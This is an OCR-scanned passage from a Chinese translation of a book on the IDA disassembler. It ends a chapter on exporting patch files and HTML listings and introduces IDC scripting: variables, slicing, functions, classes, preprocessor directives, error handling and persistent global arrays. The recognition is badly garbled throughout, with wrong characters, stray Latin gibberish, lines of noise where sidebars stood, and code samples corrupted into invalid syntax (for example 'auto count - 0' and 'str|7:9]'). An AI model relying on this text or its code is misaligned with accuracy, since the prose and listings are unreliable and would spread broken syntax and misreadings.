方 列表 。 每 一 行 都 指出 被 修改 的 字 市 的 文件 偏 移 量 ( 而 非 虚拟 地 址 )、 字 和 的 原始 值 以 及 字 贡 在 
数据 库 中 的 当前 值 。 在 这 个 特例 中 ，dif example.exe 的 数据 库 中 有 4 个 位 置 被 修改 ， 在 最 初 的 文 
件 中 ， 这 些 位 置 对 应 的 字 节 偏 移 量 为 0x2F8~0x2FB。 编 写 一 个 程序 来 解析 IDA 的 .df 文件 ， 并 应 
用 对 最 初 的 二 进 制 文 件 所 做 的 更 改 , 生 成 一 个 修补 版 本 的 二 进 制 文件 ,这 并 不 是 一 个 复 淋 的 任务 。 
本 书 的 配套 网 站 "上 提供 了 这 样 一 个 实用 工具 。 














14.2.7 IDA^EFKBSHTML x: fft 


IDA 利用 HTML 的 标记 功能 生成 彩色 的 反 汇 编 代 码 清单 。 基 本 上 ，IDA 生成 的 HTML 文件 
就 是 一 个 添加 了 HTML 标记 的 LST 文 件 ， 它 生成 的 列表 的 颜色 与 真正 的 IDA 反 汇编 窗口 使 用 的 
颜色 类 似 。 然 而 ，IDA 生成 的 HTML 文件 并 不 包含 任何 超 链接 ， 因 此 ， 导 航 这 个 文件 并 不 比 使 
用 标准 的 文本 列表 容易 。 例 如 ， 作 为 一 项 有 用 的 特性 ,我 们 可 以 给 所 有 名 称 引 用 添加 超 链接 ， 这 
样 ， 跟 踪 名 称 引 用 就 变 得 和 单 击 一 个 链接 一 样 简单 。 











14.3 小结 


IDA 并 不 是 一 个 二 进 制 文件 编辑 俘 。 任 何 时 候 ， 如 采 你 想 要 使 用 IDA 修补 一 个 二 进 制 文件 ， 
请 记 住 这 个 事实 。 但是, 它 是 一 款 特别 有 用 的 工具 ， 可 帮助 你 输入 并 显示 潜在 的 更 改 。 掌 握 IDA 
的 全 部 功能 ， 并 结合 IDA 通过 适当 的 脚本 或 外 部 程序 生成 的 信息 ， 修 补 二 进 制 文件 也 会 变 得 简 
单 可 行 。 

在 后 面 的 几 章 中 ， 我 们 将 讨论 扩展 IDA 功能 的 各 种 方式 。 对 于 希望 充分 利用 IDA 功能 的 用 
户 而 言 ， 掌 握 基 本 的 脚本 编写 技能 ， 并 理解 IDA 的 插件 体系 结构 非常 重要 ， 因 为 它们 可 帮助 你 
添加 你 认为 IDA 缺乏 的 功能 。 




















(D 参见 http://www.idabook.com/chapterl4/ida patcher.c. 


扩展 IDA 的 功能 
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编写 IDA 脚本 





实 上 ， 没 有 哪 一 个 应 用 程序 能 够 满足 每 名 用 户 的 一 切 需 求 。 要 想 预 测 每 一 种 可 能 出 现 
的 情况 ， 几 乎 是 不 可 能 的 事情 。 应 用 程序 开发 者 面临 两 种 选择 : 要 么 满足 用 户 提 出 的 
无 止境 的 功能 要 求 ， 要 么 提供 一 种 方法 ， 供 用户 解决 问题 。IDA 采用 了 后 一 种 方法 , 它 集 成 了 一 
个 脚本 引擎 ， 让 用 户 从 编程 角度 对 IDA 的 操作 进行 全 面 控制 。 
脚本 的 潜能 无 限 ， 可 用 于 开发 简单 的 单行 程序 , 也 可 以 开发 功能 全 面 的 程序 ， 从 而 自动 
执行 向 见 的 任务 ， 也 能 实现 复杂 的 分 析 功 能 。 从 目 动 化 的 角度 看 ， 你 可 以 将 IDA. 脚本 看 成 
Es 而 从 分 析 的 角度 看 , IDA 脚本 语言 可 看 成 是 一 种 查询 语言 , 它 能 够 以 编程 方式 访问 IDA 
数据 库 的 内 容 。IDA 使 用 两 种 不 同 的 语言 编写 脚本 。IDA 的 原始 租 和 人 式 脚 本 语言 叫做 IDC, 
之 所 以 取 这 个 名 称 ， 可 能 是 因为 它 的 语法 与 C 语言 的 语法 非常 相似 。 自 IDA 5.4 发 布 以 来 >， 
IDA 还 通过 集成 由 Gergely Erdelyi* 开 发 的 IDAPython 插件 来 支持 Python 集成 式 脚 本 。 本 
章 剩 余部 分 将 介绍 编写 和 执行 IDC 和 Python 脚本 的 基础 知识 ， 以 及 一 些 可 供 程 序 员 使 用 的 
^H FH ER ZR 


15.1. 执行 脚本 的 基础 知识 


在 深入 学 习 脚 本 语言 之 前 , 我 们 有 必要 了 人 解 执行 脚本 的 常用 方法 。3 个 末 单 选项 , File » Script 
File, File » IDC Command 和 File Python Command”， 可 用 于 访问 IDA 的 脚本 引擎。 选择 
File » Script File 表示 你 希望 运行 一 个 独立 的 脚本 ， 这 时 ，IDA 会 显示 一 个 选择 文件 对 话 框 ， 让 你 
选择 想 要 运行 的 脚本 。 每 次 运行 一 个 新 的 脚本 ， 这 个 程序 都 被 添加 到 最 近 运 行 的 脚本 列表 中 ， 以 
方便 你 以 后 编辑 或 再 次 运行 这 个 脚本 。 通 过 View > Recent Scripts 荣 单 项 访问 的 Recent Scripts 窗 
口 如 图 15-1 所 示 。 















































(D 许多 应 用 程序 可 将 操作 序列 记录 到 一 个 叫做 “ 宏 ” 的 复杂 操作 中 。 重播 或 触发 宏 , 将 执行 其 记录 的 整个 操作 步骤 。 
宏 提 供 了 一 种 简单 的 方法 ， 可 自动 执行 一 系列 复杂 的 操作 。 

@) 有 关 每 个 新 版 本 的 IDA 引 入 的 功能 的 完整 列表 ， 请 访问 http://www.hex-rays.com/idapro/idanew48.htm。 

(3) 参见 http://code.google.com/p/idapython/。 

D 如 果 正 确 安 装 了 Python， 只 有 这 个 选项 可 用 。 详 细 信 息 可 参见 第 3 章 。 
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Recent scripts | 到 
Ey 








Line 1 of 2 





图 15-1 Recent Scripts 窗口 


双击 列 出 的 脚本 可 执行 该 脚本 。 一 个 弹出 式 上 下 文 座 单 将 提供 各 种 选项 , 可 用 于 从 列表 中 删 
除 脚 本 ， 或 使 用 在 Misc ( 杂项 ) 选项 卡 上 的 Options > General ( 选项， 常规 ) 下 指定 的 编辑 器 对 
打开 的 某 个 脚本 进行 编辑 。 

另外 ， 要 执行 一 个 独立 的 脚本 文件 ， 可 以 使 用 File » IDC Command 或 者 File » Python 
Command 打开 一 个 脚本 输入 对 话 框 ， 如 图 15-2 所 示 ( 本 例 中 使 用 的 是 DC 脚本 )。 如 果 只 想 执 
行 少数 几 个 语句 ， 而 又 不 愿意 单独 创建 一 个 脚本 文件 ， 这 时 就 可 以 使 用 这 个 对 话 框 。 








Please enter IDC statement(z) 


Message Hello Worldiin); 


图 15-2 ”脚本 输入 对 话 框 











你 只 能 在 脚本 对 话 框 中 输入 某 些 类 型 的 语句 。 但 是 , 如 果 你 不 需要 创建 一 个 功能 全 面 的 脚本 
文件 ， 这 个 对 话 框 会 非常 有 用 。 

执行 脚本 命令 的 最 后 一 个 方法 是 使 用 IDA. 的 命令 行 。 这 个 命令 行 仅 适 用 于 GUI 版 本 的 IDA, 
并 且 由 <IDADIR>/cfgy/idagui.cfg 中 的 DISPLAY COMMAND LINE 选项 控制 。 自从 IDAS.4 以 来 , 这 个 命 
令 行 默认 都 是 启用 的 。 该 命令 行 如 图 15-3 所 示 , EMF IDA 工作 区 的 左下 角 、 输 出 窗口 的 下 面 。 








IDC -hative builtin language | 
Python - IDAPython plugin 
IDC Message("Hello World!) : 





K| 15-3 IDA 命令 行 


将 用 于 执行 命令 行 的 解释 器 在 命令 行 输入 框 的 左 侧 标 注 。 在 图 15-3 F, IDA 配置 命令 行 执 
行 IDC 语 句 。 单 击 此 标签 ， 将 打开 如 图 15-3 所 示 的 弹出 式 菜 单 ， 可 将 解释 天 (IDC 或 Python ) 
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与 命令 行 关联 起 来 。 

虽然 命令 行 中 仅仅 包含 一 行文 本 ， 但 是 ， 你 可 以 在 其 中 输入 多 个 IDC 语句 ， 并 用 分 号 将 它 
们 分 隔 开 来 。 你 可 以 使 用 向 上 箭头 键 访 问 最 近 运 行 的 命令 。 如 果 需 要 经 常 执 行 非 常 短小 的 脚本 ， 
启用 IDA 命令 行 非 常 有用。 

了 解 了 基本 的 脚本 执行 功能 后 , 接 下 来 我 们 将 详细 了 解 IDA 的 两 种 脚本 语言 ,IDC 和 Python。 
我 们 首先 介绍 IDA 的 本 地 脚本 声言 IDC， 然 后 讨论 IDA 对 Python 的 集成 (Python 在 很 大 程度 上 
依赖 于 我 们 在 接 下 来 几 市 中 介绍 的 IDC )。 
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与 IDA 的 其 他 功能 不 同 ，IDA 的 帮助 系统 为 IDA 语言 提供 了 诸多 帮助 。 帮 助 系统 中 的 主题 
大 致 包 括 IDC 语 言 (介绍 IDC 语 法 基础 ) 和 IDC 函数 目录 (详细 说 明 可 供 IDC 程序 员 使 用 的 内 
置 函数 )。 

IDC 脚本 语言 借用 了 C 语言 的 许多 语法 。 从 IDA5.6 开始 ，IDC 在 面向 对 象 特性 和 异常 处 理 
方面 与 C++ 更 为 相似 。 由 于 IDC 与 CERM C++ 语言 类 似 ， 因 此 ， 我 们 将 依据 这 些 语言 来 介绍 
IDC 语 言 ， 并 重点 说 明 这 两 种 语言 之 间 的 区 别 。 

















15.2.1 1IDC 变 量 


IDC 是 一 种 类 型 松散 的 语言 ， 这 表示 它 的 变量 没有 明确 的 类 型 。IDC 使 用 3 种 数据 类 型 : 整 
数 (IDA 文 档 使 用 类 型 名 称 1ong )、 字 符 串 和 浮 点 值 ， 其 中 绝 大 部 分 的 操作 针对 的 是 整数 和 字符 
Bo FIERI IDC 中 的 本 地 数据 类 型 ， 因 此 ， 你 不 需要 跟踪 存储 一 个 字符 串 所 需 的 空间 ， 
或 者 一 个 字符 串 是 否 使 用 零 终 止 符 。 从 IDA5.6 开始 ，IDC 加 入 了 许多 变量 类 型 ， 包 括 对 象 、 引 
FUR KRE ET o 

在 使 用 任何 变量 前 ， 都 必须 先 声 明 该 变量 。IDC 支持 局 部 变量 ， 并 且 从 IDA5.4 开始 ， 也 支 
持 全 局 变量 。IDC 关键 字 auto 用 于 引入 一 个 局 部 变量 声明 ， 并 且 局 部 变量 声明 中 可 能 包括 初始 
值 。 如 下 所 示 是 合法 与 非法 的 IDC 局 部 变量 声明 : 
































auto addr, reg, val; // legal, multiple variables declared with no initializers 
auto count - 0; // declaration with initialization 


IDC 认可 使 用 /* */R C 风格 多 行 注释 ， 以 及 使 用 // 的 C++ 风格 行 尾 注释 。 此 外 ， 需 要 注意 
的 是 ,你 可 以 在 一 个 语句 中 声明 好 几 个 变量 , 并 且 IDC 中 的 所 有 语句 均 使 用 分 号 为 终止 符 ( 和 C 
语言 中 一 样 )。IDC 并 不 支持 C 风 格 数组 (IDA $.6 引 入 了 分 片 )、 指 针 (虽然 IDA 从 IDA 5.6 开 
始 支 持 引 用 ) 或 结构 体 和 联合 之 类 的 复杂 数据 类 型 。IDA $.6 引 入 了 类 的 概念 。 

IDA 使 用 extern 关键 字 引 入 全 局 变量 声明 ， 你 可 以 在 任何 因数 定义 的 内 部 和 外 部 声明 全 局 
变量 ， 但 不 能 在 声明 全 局 变量 时 为 其 提供 初始 值 。 下 面 的 代码 清单 声明 了 两 个 全 局 变量 。 
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extern outsideGlobal; 


static main() 1 
extern insideGlobal; 
outsideGlobal = "Global"; 
insideGlobal - 1; 


j 


在 IDA 会 话 过 程 中 首次 遇 到 全 局 变量 时 ，IDA 将 对 全 局 变量 进行 分 配 ， 只 要 该 会 话 处 于 活 
动 状态 ， 无论 你 打开 或 关闭 多 少 个 数据 库 这 些 变 量 部 将 始终 有 效 。 











15.2.2 IDC 表达 式 








除 少 数 几 个 特例 外 ，IDC 几乎 支持 C 中 的 所 有 算术 和 逻辑 运算 符 ， 包 括 三 元 运算 符 (? : )。 
IDC 不 支持 op= (+s, “=, >% S) 形式 的 复合 赋值 运算 符 。 从 IDA5.6 开始 ，IDC 开始 支持 逗号 
运算 。 所 有 整数 操作 数 均 作 为 有 符号 的 值 处 理 。 这 会 影响 到 整数 比较 ( 始终 带 有 符号 ) 和 右 移 位 
运算 符 〈>> )， 因 为 它们 总 是 会 通过 符号 位 复制 进行 算术 移 位 。 如 果 需 要 进行 逻辑 右 移 位 ， 你 必 
须 修改 结果 的 最 高 位 ， 自 己 移 位 ， 如 下 所 示 : 





result = (x >> 1) & Ox7fffffff; //set most significant bit to zero 


由 于 字符 串 是 IDC 中 的 本 地 类 型 ， 因 此 ，IDC 中 的 一 些 字 符 串 运算 与 C 中 的 字符 串 运 算 有 
所 不 同 。 在 DC 中 ， 给 字符 串 变量 中 的 学 符 串 操作 数 赋值 将 导致 学 符 串 复制 操作 ， 因 此 ， 你 不 
需要 使 用 字符 串 来 复制 函数 ， 如 C 语言 中 的 strcpy 和 strdup 函数 。 将 两 个 字符 串 操 作 数 相 加 会 
将 这 两 个 操作 数 拼接 起 来 ， 因 此 “Hello”+“World” 将 得 到 “HelloWorld”。 因 此 ， 你 不 需要 使 
用 如 CC 语言 中 的 streat 之 类 的 拼接 函数 。 从 IDA 5.6 开始, IDA 提供 用 于 处 理 字符 串 的 分 片 运算 
^f (slice operator )。Python 程序 员 需 要 对 分 片 有 所 了 解 。 通 常 你 可 以 通过 分 片 指 定 与 数组 类 似 的 
变量 的 子 序列 。 分 片 使 用 方 括号 和 起 始 索引 (包括 ) 与 结束 索引 (不 包括 ) 来 指定 C 至 少 需 要 一 
个 索引 )。 下 面 的 代码 清单 说 明了 IDC 分 厂 的 用 法 。 























auto str - "String to slice"; 
auto s1, S2, S3, S4; 


s1 = str|7:9]; // “to” 

82 e E AE // “String”, omitting start index starts at 0 

s3 = str[10:]; // “slice", omitting end index goes to end of string 

s4 = str[5]; // "g', single element slice, similar to array element access 





需要 注意 的 是 ， 虽 然 IDC 中 并 没有 数组 数据 类 型 ， 但 你 可 以 使 用 分 族 运 算 符 来 处 理 IDC F 
TT, WICH SEH te 





15.2.3 1DC 语 各 


和 C 语言 一 样 ，IDC 中 的 所 有 简单 语句 均 以 分 号 结束 。switch 语句 是 IDC 唯一 不 支持 的 C 
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风格 复合 语句 。 在 使 用 for 循环 时 ,需要 记 住 的 是 ，IDC 不 文 持 复合 赋值 运算 符 ， 如 果 你 和 希望 以 
ER 1 以 外 的 其 他 值 为 单位 进行 计数 ， 就 需要 注意 这 一 点 。 如 下 所 未 : 








auto 工 ; 
tor (i = 0; i < 10; i += 2) {} // illegal, += is not supported 
for (i = 0; i < 10; i =i +2) {} // legal 


f£ IDA $.6 中 ,IDC 引 入 了 try/catch 块 和 相关 的 throw 语句 ， 在 语法 上 它们 类 似 于 Co 
A. AX IDC 异常 处 理 的 详细 信息 ， 请 参阅 IDA 的 内 置 帮助 文件 。 

在 复合 语句 中 ,IDC 使 用 和 C 语言 一 样 的 花 括号 语法 和 语义 。 在 花 括 号 中 可 以 声明 新 的 变量 ， 
只 要 变量 声明 位 于 花 括 号 内 的 第 一 个 语句 即 可 。 但 是 ,IDC 并 不 严格 限制 新 引入 的 变量 的 作用 范 
围 ， 因 此 ， 你 可 以 从 声明 这 些 变量 的 花 括 号 以 外 引用 它们 。 请 看 下 面 的 例子 : 








| //always true 
auto x; 
X = 10j 
Í 
else { //never executes 
auto y; 
y = 3; 
j 
Message("x 
Message("y 


%d\n", x);  // x remains accessible after its block terminates 
4dNn", y); // IDC allows this even though the else did not execute 


输出 语句 (Message 函数 类 似 于 C 语 言 的 printf 函数 ) 告诉 我 们 : x10, y=0。 由 于 IDC 并 不 
严格 限制 x 的 作用 域 ， 因 此 毫 不 奇怪 ， 我 们 可 以 打印 x 的 值 。 令 人 奇怪 的 是 ， 我 们 还 可 以 访问 y 
值 ， 而 声明 y 的 代码 块 从 未 执行 。 这 只 是 IDC 的 一 个 古怪 行为 。 仁 得 注意 的 是 , BA IDC 并 不 严 
格 限制 变量 在 函数 中 的 作用 域 , 但 是 , 在 一 个 隐 数 中 , 你 不 能 访问 在 其 他 任何 函数 中 声明 的 变量 。 





15.2.44 ” IDC 函数 





IDC 仅仅 在 独立 程序 ( ,idc 文件 ) 中 支持 用 户 定 义 的 函数 。 IDC 命令 对 话 框 (参见 本 市 的 “使 
用 IDC 命 令 对 话 框 ”) 不 支持 用 户 定义 的 孔 数 。IDC 用 于 声明 用 户 定义 的 函数 的 语法 与 C 语 言 
FERK, fg IDC 中 ，static 关键 字 用 于 引入 一 个 用 户 定 义 的 函数 ， 函 数 的 参数 列表 仅 包 含 一 个 
以 逗号 分 隔 的 参数 名 列表 。 下 面 详细 说 明了 一 个 用 户 定义 的 函数 的 基本 结构 : 











static my func(x, y, z) 1 
//declare any local variables first 
auto a, b, c; 
//add statements to define the function's behavior 
LS es 
} 


(D 参见 http://www.cplusplus.com/doc/tutorial/exceptions/ ; 


15.2 IDC 语言 199 


在 IDA5.6 之 前 ,所 有 也 数 参数 都 严格 采用 传 值 ( call-by-value ) 传递 ， IDA5S.6 引 入 了 传 地 址 
( call-by-reference ) 参数 传递 机 制 。 有 趣 的 是 ， 是 采用 传 值 ( call-by-value ) 方式 还 是 传 地 址 
( call-by-reference ) 方式 传递 参数 ， 由 IDA 调用 也 数 的 方式 而 不 是 声明 也 数 的 方式 决定 。 在 函数 
调用 (而 不 是 子 数 声明 ) 中 使 用 一 元 运算 符 & 说 明 该 函数 采用 传 地 址 方式 传递 参数 。 在 下 面 的 例 
子 中 ， 上 一 个 代码 清单 中 的 my func 函数 同时 采用 了 这 两 种 参数 传递 方式 。 

















auto q = 0, T= 1 332 

my func(q, r, s);  //all three arguments passed using call-by-value 
//upon return, q, r, and s hold O, 1, and 2 respectively 

my func(q, &r, s); //q and s passed call-by-value, r is passed call-by-reference 
//upon return, q, and s hold O and 2 respectively, but r may have 
//changed. In this second case, any changes that my_func makes to its 
//formal parameter y will be reflected in the caller as changes to r 


使 用 IDC 命令 对 话 框 


OX D E E e E O e o e o E a e a e o e E a E a 
本 
ELIO ELE TELE OT LEE II OC ET EE BS 000 D BIBLE BE E BIET ELLE HIE OI 
CHIC EHE ELE UOTE LE AE BE BE ETT EE DI BI DDHDODDE'P-DHEDIDELD DOC ET OLI 
ED E BH CHIESE BEI OC BD BUDE BC ED B BE BIBLE HELLE BB IBI 


如 果 你 希望 函数 返回 一 个 值 ， 可 以 使 用 return 语句 返回 指定 的 值 。 你 可 通过 函数 的 不 同 执 
行路 径 返 回 不同 的 数据 类 型 。 换 言 之 , 菏 些 情况 下 ,一 个 函数 返回 一 个 字符 串 ; 而 在 其 他 情况 下 ， 
这 个 男 数 却 返 回 一 个 整数。 和 C 语言 中 一 样 ， 你 不 一 定 非 要 在 函数 中 使 用 return 语句 。 但 是 ， 
任何 不 会 显 式 返回 一 个 值 的 旺 数 将 返回 零 值 。 

最 后 需要 注意 的 是 ， 从 IDA 5.6 开始 ， 荫 数 离 成 为 IDC 中 的 第 一 类 对 象 更 近 了 一 步 。 现 在 ， 
你 可 以 将 函数 引用 作为 参数 传递 给 故 一 个 函数 , 并 将 函数 引用 作为 函数 的 结果 返回 。 下面 的 代码 
清单 说 明了 使 用 函数 参数 和 函数 作为 返回 值 的 情况 。 

static getFunc() { 


return Message; //return the built-in Message function as a result 


} 
































static useFunc(func, arg) { //func here is expected to be a function reference 
func(arg); 
} 


static main() { 
auto f - getFunc(); 
f("Hello WorldWin"); //invoke the returned function f 
useFunc(f, "Print me\n"); //no need for & operator, functions always call-by-reference 


j 
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15.2.5 1DC 对 象 


IDA 5.6 引入 的 另 一 项 功能 是 能 够 定义 类 ， 并 因此 具有 表示 对 象 的 变量 。 在 下 面 的 讨论 中 ， 
我 们 假设 你 在 一 定 程度 上 熟悉 C++ 或 Java 等 面向 对 象 的 编程 语言 。 








IDA 脚本 发 展 


DDDUDOUUU DPA5.60 0 IDED]BL D H ODD TIB U DL BL OL ELEE BL OL EE C] UD DAS.4 
UUD IDAPython[] [] Hex-RaysD [JD D LH] IDC[J ELO THEO DU. IDASO TTE BL U D EE E] Cl 
DDO0000000000Hex-RaysD0 0000 JevsSeripti] 00 IDAOD0O0O "^ da" BU 





* 请 参见 http;//www.hexblog.com/?p-101[] 


IDC 定义 了 一 个 称 为 object WIX, Bx2X 8 ZH CREE, FHEAE SCHE 
单一 继承 。IDC 并 不 使 用 访问 说 明 符 ， 如 public 与 private。 所 有 类 成 员 均 为 有 效 公 共 类 。 类 声 
明 仅 包 含 类 成 员 函 数 的 定义 。 要 在 类 中 创建 数据 成 员 , 你 只 需要 创建 一 个 给 数据 成 员 赋 值 的 赋值 
语句 即 可 。 下 面 的 代码 清单 有 助 于 说 明 这 一 点 。 

















class ExampleClass 1 
ExampleClass(x, y) { //constructor 
this.a - x; //all ExampleClass objects have data member a 
thissb =y; //all ExampleClass objects have data member b 


} 
~ExampleClass() { //destructor 
} 


foo(x) { 
this.a = this.a + x; 
| 


//... other member functions as desired 


e 


static main() { 
ExampleClass ex; //DON'T DO THIS!! This is not a valid variable declaration 
auto ex = ExampleClass(1, 2);  //reference variables are initialized by assigning 
//the result of calling the class constructor 
ex. foo(10); //dot notation is used to access members 
ex.z = "string"; //object ex now has a member z, BUT the class does not 


Í 
有 关 IDC 类 及 其 语法 的 更 多 信息 ， 请 参阅 IDA 内 置 帮 助 文件 中 的 相应 章节 。 





15.2.6 1DC 程 序 


如 果 一 个 脚本 应 用 程序 需要 执行 大 量 的 IDC 语句 ， 你 可 能 需要 创建 一 个 独立 的 IDC 程序 文 
件 。 态 外 ， 将 脚本 保存 为 程序 ， 你 的 脚本 将 获得 一 定 程 度 的 持久 性 和 可 移植 性 。 
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IDC 程序 文件 要 求 你 使 用 用 户 定义 的 函数 。 至 少 ， 必 须 定 义 一 个 没有 参数 的 main 函数 。 另 
外 , 主 程序 文件 还 必须 包含 idc.idc 文件 以 获得 它 包含 的 有 用 安定 义 。 下 面 详细 说 明了 一 个 简单 的 
IDC 程序 文件 的 基本 结构 : 








#include «idc.idc» // useful include directive 
//declare additional functions as required 
static main() { 

//do something fun here 


Í 


IDC 认可 以 下 C 预 处 理 指令 。 

O #include< 文 件 >。 将 指定 的 文件 包含 在 当前 文件 中 。 

O #define< 宏 名 称 >[ 可 选 值 ]。 创 建 一 个 宏 ， 可 以 选择 给 它 分 配 指 定 的 值 。IDC 预定 义 了 许 
多 宏 来 测试 脚本 执行 环境 。 这 些 宏 包 括 NT. LINUX . MAC. GUI 和 _TXT 等 。 有 关 这 
些 宏 及 其 他 符号 的 详细 信息 ， 请 参阅 DA 帮助 文件 的 “预定 义 的 符号 ”( Predefined 
symbols ) 部 分 。 

O #ifdef< 名 称 >。 测 试 指定 的 宏 是 否 存在 ， 如 有 果 该 宏 存 在 ， 可 以 选择 处 理 其 后 的 任何 语句 。 

O #else。 可 以 与 有 fdef 指令 一 起 使 用 ， 如 果 指 定 的 宏 不 存在 ， 它 提供 男 一 组 供 处 理 的 语句 。 

O Zendif. 4ifdef 或 机 fdef/ 如 1se 块 所 需 的 终止 符 。 

a #undef< 名 称 >。 删 除 指定 的 宏 。 














15.2.7 ”IDC 错误 处 理 


没有 人 会 因为 DC 的 错误 报告 功能 而 称赞 IDC。 在 运行 IDC 脚本 时 ， 你 可 能 遇 到 两 种 错误 : 
解析 错误 和 运行 时 错误 。 

解析 错误 指 那 些 令 你 的 程序 无 法 运行 的 错误 , 包括 语法 错误 、 引 用 未 定义 变量 、 水 数 参 数 数 
量 错 误 。 在 解析 阶段 ，IDC 仅 报 告 它 遇 到 的 第 一 个 解析 错误 。 有 时 候 ， 错 误 消 息 能 够 正确 确定 错 
误 的 位 置 和 类 型 (hello world.idc. 20: Missing semicolon )。 而 在 有 些 情况 下 ， 错 误 消 息 并 不 
能 提供 任何 有 用 的 信息 (Syntax error near: «END» )。IDC 仅 报 告 在 解析 过 程 中 遇 到 的 第 一 个 错 
误 。 因 此 ， 如 果 一 个 脚本 包含 15 个 语法 错误 ,在 它 向 你 报告 每 个 错误 之 前 ， 它 会 进行 15 次 运行 
过 中， 


通常 ， 与 解析 错误 相 比 ， 运 行 时 错误 (runtime error ) 较为 少见 。 RES 








运行 时 错误 会 使 一 段 脚本 立即 终止 运行 。 例 如 ， 如 末 你 试图 调用 一 个 Running IDC script 
KEX HATEPEA, TE Toe BU REC ALAS NE TRU rh 


题 )， 这 时 就 会 发 生 运 行 时 错误 。 男 外 ， 如 果 一 个 脚本 的 运行 时 间 过 
长 ， 也 会 发 生 运 行 时 错误 。 一 旦 脚本 开始 运行 ， 如 末 它 不 层 进 入 一 个 ”图 15-4 取消 脚本 对 话 框 
无 限 循 环 ,或 者 运行 的 时 间 超 过 你 的 预期 ， 你 就 没有 办 法 直接 终止 这 

个 脚本 。 因 此 ， 如 果 一 个 脚本 的 运行 时 间 超 过 2 秒 或 3 秒 ，IDA 将 显示 如 图 15-4 所 示 的 对 话 框 。 
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只 有 使 用 这 个 对 话 框 ， 你 才能 终止 一 个 无 法 正常 终止 的 脚本 。 

调试 是 IDC 的 另 一 个 缺陷 。 除 了 大 量 使 用 输出 语句 外 , 你 没有 办 法 调试 IDC 脚本 ,在 IDA5.6 
中 引入 异常 处 理 (try/catch ) 之 后 ， 你 就 能 够 构建 更 加 强大 的 、 可 根据 你 的 需要 终止 或 继续 的 
脚本 。 


15.2.8 1IDC 永 久 数 据 存 储 


如 采 你 不 相信 我 们 会 全 面 介绍 IDA 的 脚本 功能 , 可 能 会 去 查看 IDA 帮助 系 统 中 的 相关 主题 。 
如 果 是 这 样 ， 欢 迎 你 以 后 再 回来 阅读 本 书 。 如 采 并 非 如 此 ， 感 谢 你 对 我 们 的 信任 。 在 学 习 IDA 
的 过 程 中 ， 你 可 能 会 得 知 DC 实际 上 并 不 文 持 数组 。 那 时 ， 你 肯定 会 质疑 本 书 的 质量 ， 现 在 我 
强烈 要 求 你 给 我 一 个 机 会 消除 这 个 潜在 的 困惑 。 

如 前 所 述 ，IDC 并 不 支持 传统 意义 上 的 数组 ， 即 那 种 首先 声明 一 个 大 型 存储 块 ， 然 后 使 用 下 
标 符号 访问 块 中 的 每 一 个 数据 项 的 数组 ,但 是 , IDA 中 有 关 脚 本 的 文档 确实 提 到 “全 局 永久 数组 ” 
( global persistent array )。 用 户 最 好 是 将 IDC 全 局 数组 看 成 已 命名 的 永久 对 象 (persistent named 
object )。 这 些 对 象 恰巧 是 稀 朴 数组 (sparse array ) "“。 全 局 数组 保存 在 IDA 数据 库 中 ， 对 所 有 脚 
本 调用 和 IDA. 会 话 永 人 有 效 。 要 将 数据 保存 在 全 局 数组 中 ， 你 需要 指定 一 个 索引 及 一 个 保存 在 
该 索引 位 置 的 数据 值 。 数 组 中 的 每 个 元 素 同 时 保存 一 个 整数 值 和 一 个 字符 串 值 。IDC 的 全 局 数组 
无 法 存储 浮 点 值 。 






































WB IDADOOO000000000000000000000000000000000 
UUDOUDOUDOUDOOUUOUUOU DASDKUDOUUOUUUUUUUD 
DUDUUDUU 16000 IDASDKITITDTD T L 





与 全 局 数组 的 所 有 交互 通过 专门 用 于 操纵 数组 的 IDC 也 数 来 完成 。 这 些 函 数 如 下 所 示 。 

O long CreateArray(string name)。 这 个 函数 使 用 指定 的 名 称 创建 一 个 永久 对 象 。 它 的 返回 
值 是 一 个 整数 句柄 ， 将 来 访问 这 个 数组 时 ， 你 需要 这 个 句柄 。 如 果 已 命名 对 象 已 经 存在 ， 
则 返回 -1。 

口 long GetArrayId(string name)。 创 建 一 个 数组 后 ， 随 后 要 访问 这 个 数组 ， 必 须 通过 一 个 
整数 句 顶 来 实现 ， 你 可 以 通过 查询 数组 名 称 获 得 这 个 句柄 。 这 个 函数 的 返回 值 是 一 个 用 
于 将 来 与 该 数组 交互 的 整数 句柄 。 如 果 已 命名 数组 并 不 存在 ， 则 返回 -1。 

口 long SetArrayLong(long id, long idx, long value)。 将 整数 value 存储 到 按 id 引用 的 
数组 中 idx 指定 的 位 置 。 如 果 操 作成 功 ， 则 返回 1， 否 则 返回 0。 如 果 数 组 id 无 效 ， 这 个 
操作 将 会 失败 。 

口 long SetArrayString(long id, long idx, string str)。 将 字符 串 value 存储 到 按 id 8| 

















CD 稀 玻 数组 不 一 定 会 预先 给 整个 数组 分 配 空间 ， 也 不 仅 限于 使 用 某 个 特殊 的 最 大 索引 。 实 际 上 ， 当 元 素 添加 到 数组 
中 时 ， 它 按 需 分 配 这 些 元 素 的 空间 。 
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用 的 数组 中 idx 指定 的 位 置 。 如 果 操 作成 功 ， 则 返回 1， 否 则 返回 0。 如 果 数 组 id 无 效 ， 
这 个 操作 将 会 失败 。 

口 string or long GetArrayElement(long tag, long id, long idx)。 虽 然 一 些 特 殊 的 函数 
可 以 根据 数据 类 型 将 数据 存储 到 数组 中 ,但 是 ， 只 有 一 个 函数 可 以 从 数组 中 提取 数据 。 
这 个 函数 可 以 从 指定 数组 Cid ) 的 指定 索引 (idx ) 位 置 提 取 一 个 整数 或 字符 串 值 。 提 取 
的 是 整数 还 是 字符 串 ， 由 tag 参数 的 值 决 定 ， 这 个 值 必须 是 常量 AR LONG (提取 整数 ) 或 
AR_STR( 提取 字符 串 )。 

口 long DelArrayElement(long tag, long id, long idx)。 从 指定 数组 中 删除 指定 数组 位 置 
的 内 容 。tag 的 值 决定 是 删除 指定 索引 位 置 的 整数 值 还 是 字符 串 值 。 

O void DeleteArray(1ong id)。 删 除 按 id 引用 的 数组 及 其 所 有 相关 内 容 。 创 建 一 个 数组 后 ， 
即使 一 个 脚本 终止 , 它 也 继续 存在 ， 直 到 调用 DeleteArray 从 创建 它 的 数据 库 中 删除 这 个 
数组 。 

口 long RenameArray(long id, string newname)。 将 按 id 引用 的 数组 重 命 名 为 newname。 如 
果 操 作成 功 ， 将 返回 1， 和 否则 返回 o. 

全 局 数组 的 作用 包括 模拟 全 局 变量 、 模 拟 复杂 的 数据 类 型 、 为 所 有 脚本 调用 提供 永久 存储 。 
在 数组 开始 执行 时 创建 一 个 全 局 数组 ,然后 将 全 局 值 存 储 到 这 个 数组 中 , 即 可 模拟 这 个 数组 的 全 
